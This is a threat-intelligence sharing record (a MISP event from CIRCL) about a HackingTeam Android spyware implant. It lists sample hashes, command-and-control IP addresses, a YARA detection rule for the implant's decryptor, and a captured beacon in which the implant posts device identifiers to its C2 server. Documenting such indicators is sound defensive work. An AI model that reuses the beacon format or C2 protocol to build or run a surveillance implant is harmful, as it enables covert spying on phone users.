{ "Event": { "analysis": "2", "date": "2016-11-15", "extends_uuid": "", "info": "OSINT - HackingTeam back for your Androids, now extra insecure!", "publish_timestamp": "1479206679", "published": true, "threat_level_id": "2", "timestamp": "1479206635", "uuid": "582adfcb-6640-46bf-ba1f-4aca950d210f", "Orgc": { "name": "CIRCL", "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f" }, "Tag": [ { "colour": "#00223b", "local": "0", "name": "osint:source-type=\"blog-post\"", "relationship_type": "" }, { "colour": "#5f0077", "local": "0", "name": "ms-caro-malware:malware-platform=\"AndroidOS\"", "relationship_type": "" }, { "colour": "#ffffff", "local": "0", "name": "tlp:white", "relationship_type": "" } ], "Attribute": [ { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1479204830", "to_ids": false, "type": "link", "uuid": "582adfde-3f7c-47f7-82ac-4146950d210f", "value": "http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1479204901", "to_ids": true, "type": "sha256", "uuid": "582ae025-fbc0-4426-b31c-4f6d950d210f", "value": "07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1479204901", "to_ids": true, "type": "sha256", "uuid": "582ae025-9014-49d4-8258-43e3950d210f", "value": "ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1479204901", "to_ids": true, "type": "sha256", "uuid": "582ae025-8698-43d4-b114-41bb950d210f", "value": "e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1479204902", "to_ids": true, "type": "sha256", "uuid": "582ae026-de30-4ef7-a4b9-49ca950d210f", "value": "87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c" }, { "category": "Payload delivery", "comment": "- Xchecked via VT: 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c", "deleted": false, "disable_correlation": false, "timestamp": "1479206380", "to_ids": true, "type": "sha1", "uuid": "582ae5ec-8338-4d70-84bc-435e02de0b81", "value": "03ea8043d16ecb9a462cc99d26b80889671e7621" }, { "category": "Payload delivery", "comment": "- Xchecked via VT: 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c", "deleted": false, "disable_correlation": false, "timestamp": "1479206380", "to_ids": true, "type": "md5", "uuid": "582ae5ec-addc-4442-928a-427e02de0b81", "value": "badbbb8189d3aa6d0352bf8a02c1e79d" }, { "category": "External analysis", "comment": "- Xchecked via VT: 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c", "deleted": false, "disable_correlation": false, "timestamp": "1479206380", "to_ids": false, "type": "link", "uuid": "582ae5ec-7c10-4df6-bda2-4d6002de0b81", "value": "https://www.virustotal.com/file/87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c/analysis/1479180111/" }, { "category": "Payload delivery", "comment": "- Xchecked via VT: e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c", "deleted": false, "disable_correlation": false, "timestamp": "1479206381", "to_ids": true, "type": "sha1", "uuid": "582ae5ed-3c64-48ad-b8bb-4b3e02de0b81", "value": "a65f80a623269307067416225ce2a6cfc0557ac4" }, { "category": "Payload delivery", "comment": "- Xchecked via VT: e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c", "deleted": false, "disable_correlation": false, "timestamp": "1479206381", "to_ids": true, "type": "md5", "uuid": "582ae5ed-c588-46b4-8052-40a402de0b81", "value": "cbd1c2db9ffc6b67cea46d271594c2ae" }, { "category": "External analysis", "comment": "- Xchecked via VT: e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c", "deleted": false, "disable_correlation": false, "timestamp": "1479206381", "to_ids": false, "type": "link", "uuid": "582ae5ed-7e94-4dfd-8e88-45be02de0b81", "value": "https://www.virustotal.com/file/e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c/analysis/1479180040/" }, { "category": "Payload delivery", "comment": "- Xchecked via VT: ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818", "deleted": false, "disable_correlation": false, "timestamp": "1479206381", "to_ids": true, "type": "sha1", "uuid": "582ae5ed-5080-4e70-b5e4-4e0302de0b81", "value": "f60c545f08c74de317458c416a8768835bafe41b" }, { "category": "Payload delivery", "comment": "- Xchecked via VT: ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818", "deleted": false, "disable_correlation": false, "timestamp": "1479206382", "to_ids": true, "type": "md5", "uuid": "582ae5ee-a844-4b86-9e4e-449f02de0b81", "value": "3c1055f19971d580ef9ced172d8eba3b" }, { "category": "External analysis", "comment": "- Xchecked via VT: ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818", "deleted": false, "disable_correlation": false, "timestamp": "1479206382", "to_ids": false, "type": "link", "uuid": "582ae5ee-92e0-45eb-9e4d-40f202de0b81", "value": "https://www.virustotal.com/file/ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818/analysis/1477481986/" }, { "category": "Payload delivery", "comment": "- Xchecked via VT: 07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31", "deleted": false, "disable_correlation": false, "timestamp": "1479206382", "to_ids": true, "type": "sha1", "uuid": "582ae5ee-97cc-4e28-8b99-45c702de0b81", "value": "c0802514739173623a319db4551f88d2ca71bdb2" }, { "category": "Payload delivery", "comment": "- Xchecked via VT: 07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31", "deleted": false, "disable_correlation": false, "timestamp": "1479206382", "to_ids": true, "type": "md5", "uuid": "582ae5ee-4ef4-44ab-9022-46fa02de0b81", "value": "60f0c18fae934d1033394d62951d5dc8" }, { "category": "External analysis", "comment": "- Xchecked via VT: 07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31", "deleted": false, "disable_correlation": false, "timestamp": "1479206382", "to_ids": false, "type": "link", "uuid": "582ae5ee-9580-4da9-9118-48ad02de0b81", "value": "https://www.virustotal.com/file/07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31/analysis/1479179966/" }, { "category": "Artifacts dropped", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1479206445", "to_ids": true, "type": "yara", "uuid": "582ae62d-3180-4824-b898-40af950d210f", "value": "rule HackingTeam_Android : Android Implant\r\n{\r\n\tmeta:\r\n\t\tdescription = \"HackingTeam Android implant, known to detect version v4 - v7\"\r\n\t\tauthor = \"Tim 'diff' Strazzere \"\r\n reference = \"http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/\"\r\n\t\tdate = \"2016-11-14\"\r\n\t\tversion = \"1.0\"\r\n strings:\r\n $decryptor = {\r\n 12 01 // const/4 v1, 0x0\r\n D8 00 ?? ?? // add-int/lit8 ??, ??, ??\r\n 6E 10 ?? ?? ?? 00 // invoke-virtual {??} -> String.toCharArray()\r\n 0C 04 // move-result-object v4\r\n 21 45 // array-length v5, v4\r\n 01 02 // move v2, v0\r\n 01 10 // move v0, v1\r\n 32 50 11 00 // if-eq v0, v5, 0xb\r\n 49 03 04 00 // aget-char v3, v4, v0\r\n DD 06 02 5F // and-int/lit8 v6, v2, 0x5f <- potentially change the hardcoded xor bit to ??\r\n B7 36 // xor-int/2addr v6, v3\r\n D8 03 02 ?? // and-int/lit8 v3, v2, ??\r\n D8 02 00 01 // and-int/lit8 v2, v0, 0x1\r\n 8E 66 // int-to-char v6, v6\r\n 50 06 04 00 // aput-char v6, v4, v0\r\n 01 20 // move v0, v2\r\n 01 32 // move v2, v3\r\n 28 F0 // goto 0xa\r\n 71 30 ?? ?? 14 05 // invoke-static {v4, v1, v5}, ?? -> String.valueOf()\r\n 0C 00 // move-result-object v0\r\n 6E 10 ?? ?? 00 00 // invoke-virtual {v0} ?? -> String.intern()\r\n 0C 00 // move-result-object v0\r\n 11 00 // return-object v0\r\n }\r\n // Below is the following string, however encoded as it would appear in the string table (length encoded, null byte padded)\r\n // Lcom/google/android/global/Settings;\r\n $settings = {\r\n 00 24 4C 63 6F 6D 2F 67 6F 6F 67 6C 65 2F 61 6E\r\n 64 72 6F 69 64 2F 67 6C 6F 62 61 6C 2F 53 65 74\r\n 74 69 6E 67 73 3B 00\r\n }\r\n // getSmsInputNumbers (Same encoded described above)\r\n $getSmsInputNumbers = {\r\n 00 12 67 65 74 53 6D 73 49 6E 70 75 74 4E 75 6D\r\n 62 65 72 73 00\r\n }\r\n condition:\r\n $decryptor and ($settings and $getSmsInputNumbers)\r\n}" }, { "category": "Network activity", "comment": "C2 for 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c", "deleted": false, "disable_correlation": false, "timestamp": "1479206520", "to_ids": true, "type": "ip-dst", "uuid": "582ae678-60f4-49dd-9680-4533950d210f", "value": "68.233.237.11" }, { "category": "Network activity", "comment": "C2 for 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c", "deleted": false, "disable_correlation": false, "timestamp": "1479206549", "to_ids": true, "type": "ip-dst", "uuid": "582ae695-7fd8-4183-b00e-484f950d210f", "value": "66.232.100.221" }, { "category": "Network activity", "comment": "RequestActionsToExecute - Request", "deleted": false, "disable_correlation": false, "timestamp": "1479206635", "to_ids": false, "type": "text", "uuid": "582ae6df-a770-49ef-ad0b-4c77950d210f", "value": "POST /UlisseREST/api/actions/RequestActionsToExecute HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/json\r\nAccept: application/json\r\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; BLU STUDIO 5.0 C Build/KOT49H)\r\nHost: 68.233.237.11\r\nAccept-Encoding: gzip\r\nContent-Length: 475\r\n{\"CommandLine\":\"\",\"CurrentDirectory\":\"\",\"Id\":\"8f4af21e-29fb-48e9-8b52-8cf87fcdec57\",\"LeaID\":\"00000000-0000-0000-0000-000000000000\",\"MachineName\":\"BLU BLU STUDIO 5.0 C BLU STUDIO 5.0 C IMEI: XXXXXXXXXXXXXXX IMSI: null\",\"OsType\":5,\"Platform\":\" Board:BLU STUDIO 5.0 C Brand:BLU Device:BLU STUDIO 5.0 C\",\"Version\":\"Release: 4.4.2 CodeName: REL Inc: eng.android.1441800693 SDK: 19\",\"ServicePack\":\"\",\"SystemDirectory\":\"\",\"UserDomainName\":\"\",\"UserName\":\"android\",\"ProcessorCount\":0}" } ] } }